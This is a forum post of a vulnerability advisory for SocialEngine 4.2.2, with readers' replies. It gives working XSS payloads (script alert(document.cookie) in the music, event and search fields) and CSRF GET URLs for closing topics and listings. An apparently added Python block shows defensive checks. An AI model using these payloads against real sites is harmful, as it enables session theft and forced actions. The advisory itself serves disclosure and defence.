SocialEngine 4.2.2 Multiple Vulnerabilities
Earlier versions are also possibly vulnerable.
INFORMATION
Product: Social Engine 4.2.2
Remote-Exploit: yes
Vendor-URL: http://www.socialengine.net/
Discovered by: Tiago Natel de Moura aka "i4k"
Discovered at: 10/04/2012
CVE Notified: 10/04/2012
CVE Number: CVE-2012-2216
OVERVIEW
Social Engine version 4.2.2 is vulnerable to XSS and CSRF.
INTRODUCTION
SocialEngine is a PHP-based white-label social networking service
platform that provides features similar to a social network on a user's
website. Main features include administration of small-to-mid scale
social networks, some customization abilities, unencrypted code,
multilingual capability, and modular plugin/widget compatibility. There
is a range of templates and add-ons available to extend the basic
features already included in the SocialEngine core.
VULNERABILITY DESCRIPTION
== Persistent XSS in music upload. ==
CWE-79: http://cwe.mitre.org/data/definitions/79.html
The software does not neutralize or incorrectly neutralizes
user-controllable input before it is placed in output that is
used as a web page that is served to other users.
Proof Of Concept:
POST http://localhost/index.php/music/create
POST data without form-data enctype:
title=<script>alert(document.cookie);</script>&description=teste
&search=1&auth_view=everyone&MAX_FILE_SIZE=8388608&filename=
&fancyuploadfileids=15
== Persistent XSS in creating events ==
POST http://localhost/socialengine/socialengine422_trial/index.php/events/create
POST data without form-data enctype:
title=teste XSS 3&description=teste XSS 3&starttime=4/9/2012&
starttime=1&starttime=0&starttime=AM&endtime=4/12/2012
&endtime=1&endtime=0&endtime=AM&host=teste
&location=<script>alert(document.cookie);</script>&MAX_FILE_SIZE=8388608&
photo=&category_id=0&search=&search=1&approval=&auth_invite=&auth_invite=1&
auth_view=everyone&auth_comment=everyone&auth_photo=everyone&submit=
== Reflected XSS in search form of events area. ==
JavaScript injected directly:
POST http://localhost/index.php/widget/index/content_id/644
format=html&subject=event_1&search=';alert(document.cookie);var a = '
Proof of Concept:
- Go to URL: /index.php/event/$EVENT_ID
- Click on "Guests"
- Click in the "Search guests" form
- Submit: ';alert(document.cookie); var a = '
You will see your PHPSESSID in the alert.
== Multiple CSRF vulnerabilities ==
CWE-352: http://cwe.mitre.org/data/definitions/352.html
The web application does not, or can not, sufficiently verify whether
a well-formed, valid, consistent request was intentionally provided by
the user who submitted the request.
A CSRF in the "Forum" plugin allows forcing the owner of the event to perform
actions such as:
Close a topic:
GET /index.php/forums/topic/4/example-topic/close/close/1
Open a topic:
GET /index.php/forums/topic/4/example-topic/close/close/0
A CSRF in the "Event" plugin allows forcing the owner of the event to perform
actions such as:
Close the event:
GET /index.php/events/topic/close/close/1/event_id/2/topic_id/2
Open the event:
GET /index.php/events/topic/close/close/0/event_id/2/topic_id/2
"Watch Topic":
GET /index.php/events/topic/watch/watch/1/event_id/2/topic_id/2
"Stop Watching Topic":
GET /index.php/events/topic/watch/watch/0/event_id/2/topic_id/2
A CSRF in the "Classifieds" plugin allows forcing the owner of the event to
perform actions such as:
Open the classified listing:
GET /index.php/classifieds/close/1/closed/0
Close the classified listing:
GET /index.php/classifieds/close/1/closed/1
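The two weaknesses above (CWE-79 output that is not neutralised, and CWE-352 state changes reachable by plain GET) can be checked mechanically in front of an unpatched install. The following is an added example, not code from the advisory or from SocialEngine: a request-policy check that a reverse proxy or middleware could apply, with the route patterns generalised from the PoC URLs above and SITE_ORIGIN, csrf_verdict, html_text and js_string being names assumed here.

```python
import hmac
import json
import re
from html import escape
from urllib.parse import urlsplit

SITE_ORIGIN = "http://localhost"  # assumed origin of the SocialEngine install

# State-changing routes from the advisory's CSRF PoCs (CWE-352). The patterns
# are an assumption generalised from those example URLs.
STATE_CHANGING_ROUTES = [
    re.compile(r"^/index\.php/forums/topic/\d+/[^/]+/close/close/[01]$"),
    re.compile(r"^/index\.php/events/topic/(close|watch)/\1/[01]/event_id/\d+/topic_id/\d+$"),
    re.compile(r"^/index\.php/classifieds/close/\d+/closed/[01]$"),
]


def is_state_changing(path: str) -> bool:
    """True if the path is one of the actions the advisory shows reachable by GET."""
    return any(p.match(path) for p in STATE_CHANGING_ROUTES)


def csrf_verdict(method, path, headers, session_token, form_token=None):
    """Decide whether a request to a state-changing action should be served.

    A safe action never changes state on GET, carries a token bound to the
    session, and comes from this site's own origin.
    """
    if not is_state_changing(path):
        return "allow"
    if method != "POST":
        return "deny:get-state-change"
    if not form_token or not hmac.compare_digest(form_token, session_token):
        return "deny:bad-token"
    origin = headers.get("Origin") or headers.get("Referer") or ""
    if urlsplit(origin).netloc != urlsplit(SITE_ORIGIN).netloc:
        return "deny:cross-site"
    return "allow"


def html_text(value: str) -> str:
    """Encoder for the persistent XSS fields (title, description, location): HTML body context."""
    return escape(value, quote=True)


def js_string(value: str) -> str:
    """Encoder for the reflected search value, which lands inside a JS string literal.

    HTML encoding is the wrong tool here: the quote and any </script> must be
    neutralised for the JavaScript context, so emit a JSON string literal with '/' escaped.
    """
    return json.dumps(value).replace("/", "\\/")
```

The point of js_string is that the search PoC breaks out of a JavaScript string, so the encoder has to match the sink's context rather than the HTML one used for title and location.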
VERSIONS AFFECTED
Tested with version 4.2.2 but earlier versions are possibly vulnerable.
SOLUTION
Upgrade to Social Engine 4.2.4.
NOTES
The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2012-2216 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.
CREDITS
Tiago Natel de Moura aka "i4k"
SEC+ Information Security Company - http://www.secplus.com.br/
BugSec Security Team - http://bugsec.googlecode.com/
--
Tiago Natel de Moura
IT Security Consultant
http://www.linkedin.com/in/tiagonatel
http://www.secplus.com.br/
http://github.com/tiago4orion
http://code.google.com/p/bugsec
I can't understand the code.
Xiaodong, what is this used for?
Re: SocialEngine 4.2.2 Multiple Vulnerabilities
Thanks to the OP for sharing this vulnerability intel. SocialEngine 4.2.2 really does have multiple XSS and CSRF issues, and the PoCs are written clearly, especially the persistent XSS in event creation and music upload and the reflected XSS in the search box; these are all practically exploitable entry points. Users running this version are advised to upgrade or patch as soon as possible; if upgrading is not possible for now, consider strengthening input filtering and output encoding, and adding CSRF token protection to critical operations. Thanks again for the disclosure; responsible publication like this is very helpful for administrators' security operations.
Re: SocialEngine 4.2.2 Multiple Vulnerabilities
Thanks to the OP for sharing this vulnerability intel; the multiple XSS and CSRF vulnerabilities in SocialEngine 4.2.2 are a useful reference. The exploitation method for the persistent XSS in music upload and event creation is clear, and the reflected XSS injected through the search form also shows a real effect. These vulnerabilities all put user data at risk; users of this version are advised to watch for the official patch or upgrade as soon as possible.
Re: SocialEngine 4.2.2 Multiple Vulnerabilities
This vulnerability report is very detailed; thanks for sharing. SocialEngine 4.2.2 has XSS and CSRF problems in several places, and PoCs are given for all of them, which is a useful reference for administrators and site owners. Users still on this version are advised to upgrade to the latest version as soon as possible, or to harden input filtering and CSRF tokens. Also, the two persistent XSS issues in music upload and event creation are fairly serious; if an attacker exploits them successfully, they could obtain user sessions. Good work!